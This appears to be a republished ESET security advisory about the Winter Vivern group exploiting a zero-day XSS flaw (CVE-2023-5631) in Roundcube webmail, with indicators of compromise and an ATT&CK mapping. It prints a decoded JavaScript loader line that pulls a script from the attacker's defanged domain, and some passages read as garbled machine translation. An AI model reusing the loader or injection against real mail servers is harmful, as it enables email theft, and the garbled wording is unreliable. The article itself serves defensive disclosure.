Winter Vivern exploits zero-day vulnerability in Roundcube webmail servers

esteria.white

ESET Research

ESET Research recommends updating Roundcube Webmail to the latest available version as soon as possible.

Winter Vivern exploits zero-day vulnerability in Roundcube webmail servers

ESET Research has been closely tracking Winter Vivern’s cyberespionage operations for over a year, and during our routine monitoring we discovered that the group had begun operating a zero-day cyberespionage system. XSS vulnerability in the Roundcube Webmail server on October 11th2023. This is a different vulnerability than CVE-2020-35730which was also exploited by the group according to our research.

According to ESET telemetry data, the campaign targeted Roundcube Webmail servers owned by government entities and a think tank, all located in Europe.

Vulnerability Disclosure Schedule:

  • 2023-10-12: ESET Research reported the vulnerability to the Roundcube team.
  • 2023-10-14: The Roundcube team responded and acknowledged the vulnerability.
  • 2023-10-14: The Roundcube team fixed the vulnerability.
  • 2023-10-16: The Roundcube team has released security updates to fix the vulnerability (1.6.4, 1.5.5 and 1.4.15).
  • 2023-10-18: ESET CNA issues a CVE for the vulnerability (CVE-2023-5631).
  • 2023-10-25: ESET Research blog article published.

We would like to thank the Roundcube developers for their quick response and for fixing the vulnerability in such a short time.

Winter Vivern Profile

Winter Vivern is a cyberespionage group first revealed by Domain Tools in 2021. It is believed to have been active since at least 2020 and targets governments in Europe and Central Asia. To compromise its targets, the group uses malicious documents, phishing sites, and a custom PowerShell backdoor (see articles in National Cyber ​​Protection Center of Ukraine and of Sentinel Laboratories). We believe with low confidence that Winter Vivern is related to Moustached Bouncera sophisticated Belarus-aligned group that we first published about in August 2023.

Winter Vivern has been targeting Zimbra and Roundcube email servers owned by government entities since at least 2022 – see this article from Point of proof. We observed in particular that the group exploited CVE-2020-35730another XSS vulnerability in Roundcube, in August and September 2023. Note that Sédnit (also known as APT28) also exploits this old XSS vulnerability in Roundcube, sometimes against the same targets.

Technical details

Exploitation of XSS vulnerability, attributed CVE-2023-5631, can be done remotely by sending a specially designed email message. In this Winter Vivern campaign, emails were sent from team.managment@outlook(.)com and had the subject Start in your Outlookas shown on the Figure 1.

Figure-1-wintervivern-email
Figure 1. Malicious email message

At first glance, the email does not appear malicious, but looking at the HTML source code, shown in Figure 2we can see an SVG tag at the end, which contains a base64 encoded payload.

Figure-2-email-message-winter-vivern
Figure 2. Email message containing a malicious SVG tag

Once we decode the base64 encoded value in the href attribute of to use label, we have:

X value argument of href the attribute is not a valid URL, that of this object a mistake the attribute will be activated. Decode the payload in the a mistake The attribute gives us the following JavaScript code (with the malicious URL manually defanged), which will be executed in the victim’s browser as part of their Roundcube session:

var fe=document.createElement(‘script’);fe.src=”https://recsecas(.)com/controlserver/checkupdate.js”;document.body.appendChild(fe);

Surprisingly, we noticed that JavaScript injection worked on a fully patched Roundcube instance. It turned out to be a zero-day XSS vulnerability affecting server-side scripting. rcube_washtml.php, which does not properly sanitize the malicious SVG document before being added to the HTML page interpreted by a Roundcube user. We reported it to Roundcube and it was patched October 14th2023 (see this commit). Vulnerability affects Roundcube variants 1.6.x before 1.6.4, 1.5.x before 1.5.5 and 1.4.x before 1.4.15.

In summary, by sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user’s browser window. No manual interaction other than viewing the message in a web browser is required.

The second step is a simple JavaScript loader named checkupdate.js and is shown in Figure 3.

Figure-3-javascript-loader
Figure 3. JavaScript Loader

The final JavaScript payload – displayed in Figure 4 – is able to list folders and emails from the current Roundcube account, and exfiltrate emails to the C&C server by making HTTP requests to https://recsecas(.)com/controlserver/saveMessage.

Figure 4 - Final payload
Figure 4. Final JavaScript payload exfiltrating emails from Roundcube account (portion of obfuscated script removed for clarity)

Conclusion

Winter Vivern has scaled up its operations using a zero-day vulnerability in Roundcube. Previously, it used known vulnerabilities in Roundcube and Zimbra, for which proofs of concept are available online.

Despite the low sophistication of the group’s toolset, it poses a threat to European governments due to its persistence, its very regular phishing campaigns and the fact that a significant number of applications accessible on the Internet do not are not regularly updated, although they are known to contain vulnerabilities. .

For any inquiries about our research published on WeLiveSecurity, please contact us at menaceintel@eset.com.
ESET Research offers intelligence reports and private APT data feeds. For any inquiries about this service, visit ESET Threat Intelligence page.

IoC

Files

SHA-1

File name

Detection

Description

97ED594EF2B5755F0549C6C5758377C0B87CFAE0

checkupdate.js

JS/WinterVivern.B

JavaScript loader.

8BF7FCC70F6CE032217D9210EF30314DDD6B8135

N / A

JS/Kryptik.BIK

JavaScript payload exfiltrating emails into Roundcube.

Network

IP

Domain

Hosting Provider

Seen the first time

Details

38.180.76(.)31

recsecas(.)with

M247 Europe SRL

2023-09-28

C&C Winter Vivern Server

Email addresses

team.managment@outlook(.)com

This table was constructed using version 13 of the MITER ATT&CK framework.

Tactical

IDENTIFIER

Name

Description

Resource development

T1583.001

Acquire infrastructure: domains

Winter Vivern operators have purchased a domain on Registrar.eu.

T1583.004

Acquire infrastructure: server

Winter Vivern operators have rented a server at M247.

T1587.004

Develop Abilities: Feats

The Winter Vivern operators likely developed an exploit for Roundcube.

Initial access

T1190

Operate a public application

Winter Vivern sent an email exploiting CVE‑2023-5631 in Roundcube.

T1566

Phishing

The vulnerability is triggered via a phishing email, which must be opened in the Roundcube webmail by the victim.

Execution

T1203

Operation for customer execution

The JavaScript payload is executed by an XSS vulnerability in Roundcube.

Discovery

T1087.003

Account Discovery: Email Account

The JavaScript payload can list the folders of the email account.

Collection

T1114.002

Email collection: remote email collection

The JavaScript payload can exfiltrate emails from the Roundcube account.

Command and control

T1071.001

Application Layer Protocol: Web Protocols

C&C communications use HTTP.

Exfiltration

T1041

Exfiltration on channel C2

Exfiltration is done via HTTP and to the same C&C server.

Leave a comment